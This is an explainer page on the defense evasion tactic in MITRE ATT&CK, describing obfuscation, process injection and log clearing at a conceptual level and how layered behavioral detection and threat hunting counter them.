Defense Evasion

Defense evasion is the set of techniques attackers use to avoid being detected, such as obfuscating or encoding code, disabling or tampering with security tools, and hiding payloads inside legitimate processes. In the MITRE ATT&CK framework it is the tactic TA0005, and it is unusual because it does not describe a single goal like stealing data. Instead, it wraps around almost everything else an attacker does, turning a noisy action into a quiet one.

Why Defense Evasion Matters

Every other tactic, from credential theft to lateral movement, becomes far more dangerous when it goes unseen. An attacker who can act without triggering an alert gains the one resource that matters most: time. That is why evasion is treated less like an optional step and more like a baseline requirement for serious intrusions.

The scale of this is striking. In Anthropic's analysis of real-world attacks, defense evasion was the single largest tactic, present in 84.4% of actors, which you can read about in our breakdown of how hackers use AI. When more than four in five adversaries prioritize staying hidden, detection becomes the central problem of modern defense.

Common Defense Evasion Techniques

Defense evasion covers dozens of distinct methods, but most fall into a few recognizable families.

These techniques are powerful precisely because they target the assumptions defenders rely on. Signature-based scanners assume malicious code looks recognizable, and obfuscation breaks that assumption. Monitoring assumes logs are complete, and log clearing breaks that one.

Malicious Payload

→obfuscate

Encoded or Packed Code

→inject

Trusted Process

→suppress

Logs and Alerts Blinded

Detecting and Countering Evasion

Because evasion attacks the tools that watch for attacks, no single product stops it. The defensive answer is layering. Modern endpoint detection and response platforms focus on behavior rather than signatures, flagging suspicious injection, tampering with security services, and abnormal command lines that obfuscation cannot easily hide.

Beyond automated detection, human-led threat hunting assumes an evasive actor may already be inside and goes looking for the residue they leave behind: cleared logs, disabled defenses, or a process spawning where it should not. The lesson of an 84.4% prevalence rate is simple. Defenders cannot assume silence means safety, because the most capable adversaries spend their first effort making sure you hear nothing at all.